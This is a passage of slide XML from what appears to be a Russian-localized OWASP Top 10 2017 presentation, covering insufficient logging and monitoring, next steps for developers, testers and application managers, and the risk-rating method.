            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, and log correlation software with custom dashboards and alerting.</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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1"/>
              <a:t>Logging &amp; Monitoring</a:t>
            </a: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Exploitability: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Detectability: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Technical:</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="90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Most successful attacks start with vulnerability probing.</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Allowing such probes to continue can raise the likelihood of successful exploit to nearly 100%.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </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2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In 2016, identifying a breach took an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>average of 191 days</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – plenty of time for damage to be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dirty="1" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls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Whether you are new to web application security or already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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To help organizations and developers reduce their application security risks in a cost-effective manner, OWASP has produced numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" u="sng" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" u="none" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>resources that you can use to address application security in your organization.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The following are some of the many resources OWASP has produced to help organizations produce secure web applications and APIs.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>There are numerous additional OWASP resources available for your use.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="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To produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" dirty="1" u="sng" baseline="0" sz="900">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>secure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you use the OWASP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If you’re outsourcing, consider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baseline="0" sz="90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as a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Using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Standard Security Controls</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This model helps organizations formulate and implement a strategy for software security that is tailored to the specific risks facing their organization.</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For hands-on learning about vulnerabilities, try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or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stay current, come to an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OWASP AppSec Conference</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+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Developers</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dirty="1" sz="900" b="1">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dirty="1" sz="900" b="1">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ru-RU" dirty="1" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Continuous Application Security Testing</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But it’s critical to verify that the security you intended to build is actually present, correctly implemented, and used everywhere it is supposed to be.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goal of application security testing is to provide this evidence.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work is difficult and complex, and modern high-speed development processes like Agile and DevOps have put extreme pressure on traditional approaches and tools.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software development requires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continuous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Look to enhance existing development pipelines with security automation that doesn’t slow development.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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1"/>
              <a:t>Testers</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Priorities come from the threat model, so if you don’t have one, you need to create one before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Consider using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and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an input and don’t rely on tool vendors to decide what’s important for your business.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Attempts to force extra steps, gates, and reviews are likely to cause friction, get bypassed, and struggle to scale.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Look for natural opportunities to gather security information and feed it back into your process.</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Testing Strategies</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Focus on what’s important and expand your verification program over time.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means expanding the set of security defenses and risks that are being automatically verified as well as expanding the set of applications and APIs being covered.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baseline="0" sz="1050" b="1">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and Accuracy</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Build trust by showing you understand how the application works.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Describe clearly how it can be abused without “lingo” and include an attack scenario to make it real.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Make a realistic estimation of how hard the vulnerability is to discover and exploit, and how bad that would be.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Finally, deliver findings in the tools development teams are already using, not PDF files.</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the Threat Model</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Your</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t>
            </a:r>
          </a:p>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SDLC</a:t>
            </a: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dirty="1" sz="1050" b="1">
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Clearly Communicate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1" sz="1050" b="1">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dirty="1"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Организация OWASP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Данный документ выпущен под лицензией Creative Commons Attribution Share-Alike 4.0.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1000" baseline="0">
                          <a:latin typeface="Liberation Sans"/>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В случае переиспользования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rtl="0">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dirty="1"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призывающее организации разрабатывать, приобретать и поддерживать безопасные приложения и интерфейсы прикладного программирования (API).</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At OWASP, you'll find free and open:</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Презентации и </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>видео</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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7"/>
                        </a:rPr>
                        <a:t>Cheat sheets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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Standard security controls and libraries.</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8"/>
                        </a:rPr>
                        <a:t>Local chapters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Cutting edge research.</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Extensive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>conferences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10"/>
                        </a:rPr>
                        <a:t>Списки рассылок</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Более подробная информация на:</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hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</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All OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving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a new kind of organization.</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Our freedom from commercial pressures allows us to provide unbiased, practical, and cost-effective information about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not affiliated with any technology company, although we support the informed use of commercial security technology.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OWASP produces many types of materials in a collaborative, transparent, and open way.</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The OWASP Foundation is the non-profit entity that ensures the project's long-term success.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Almost everyone associated with OWASP is a volunteer, including the OWASP board, chapter leaders, project leaders, and project members.</a:t>
                      </a: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We support innovative security research with grants and infrastructure.</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Come join us!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С</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ПВ</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Примечания к выпуску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безопасности приложений</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ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Т10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0" i="0" u="none" strike="noStrike" baseline="0" noProof="0"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OWASP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Разглашение конфиденциальных данных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безопасности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десериализация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известными</a:t>
                      </a:r>
                      <a:b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уязвимостями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A10:2017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журналирования и мониторинга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разработчикам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тестировщикам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организациям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приложений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угрозах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+К</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категориях угроз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данные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Благодарности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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Your Application Security Program Now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Applica</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Between increasing attacks and regulatory pressures, organizations must establish effective processes and capabilities for securing their applications and APIs.</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Given the staggering amount of code in the numerous applications and APIs already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Achieving application security requires many different parts of an organization to work together efficiently, including security and audit, software development, business, and executive management.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Security should be visible and measurable, so that all the different players can see and understand the organization’s application security posture.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Focus on the activities and outcomes that actually help improve enterprise security by eliminating or reducing risk.</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and the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+O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">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dirty="1" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manage the Full Application Lifecycle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IT management for an application should be performed by IT specialists who are responsible for the overall IT lifecycle of an application.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 suggest establishing the role of application manager as technical counterpart to the application owner.</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application manager is in charge of the whole</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pPr>
                      <a:br>
                        <a:rPr lang="ru-RU" dirty="1"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+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1"/>
              <a:t>Application </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" dirty="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1"/>
              <a:t>Managers</a:t>
            </a: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rPr>
                        <a:t>It’s About the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Risks that Weaknesses Represent</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each Top 10 category, we estimated the typical risk that each weakness introduces to a typical web application by looking at common likelihood factors and impact factors for each common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We then ordered the Top 10 according to those weaknesses that typically introduce the most significant risk to an application.</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a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="950">
                          <a:latin typeface="Liberation Sans"/>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a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="950">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> the risk of an identified vulnerability.</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However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications and APIs.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Consequently, we can never be as precise as application owners or managers when calculating risks for their application(s).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weakness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prevalence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one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impact factor (technical impact).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prevalence data, we have been supplied prevalence statistics from a number of different organizations (as referenced in the Acknowledgements on page 25), and we have aggregated their data together to come up with a Top 10 likelihood of existence list by prevalence.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This data was then combined with the other two likelihood factors (detectability and ease of exploit) to calculate a likelihood rating for each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 likelihood rating was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the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approach does not take the likelihood of the threat agent into account.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Nor does it account for any of the various technical details associated with your particular application.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Any of these factors could significantly affect the overall likelihood of an attacker finding and exploiting a particular vulnerability.</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rating does not take into account the actual impact on your business</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dirty="1" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Application</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Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY:</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ru-RU" dirty="1" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1100" b="1" baseline="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EASY:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1"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Technical</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE:</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1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Business</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dirty="1"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ru-RU" dirty="1" sz="1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Average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1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="2400" b="1" baseline="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ru-RU" dirty="1" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= 6.0</a:t>
            </a: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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" dirty="1">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Note About Risks</a:t>
            </a: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dirty="1" sz="1600" b="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 Risk Factor Summary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factors were determined based on the available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> statistics and the experience of the OWASP Top 10 team</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To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" u="sng" baseline="0" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>you must consider your own specific threat agents and business impacts</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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" baseline="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ru-RU" dirty="1" sz="1600" b="1">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dirty="1" sz="950" b="1">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A1:2017-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" dirty="1">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" sz="900" b="1">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dirty="1" sz="95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dirty="1" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-</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Sens.</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baseline="0" sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Data Exposure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A4:2017-XML Exter-nal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2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dirty="1" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A6:2017-Security Misconfiguration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A9:2017-Vulnerable</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sz="900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Components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A10:2017-Insufficient</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Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" dirty="1" baseline="0" sz="900" b="1">
                          <a:solidFill>
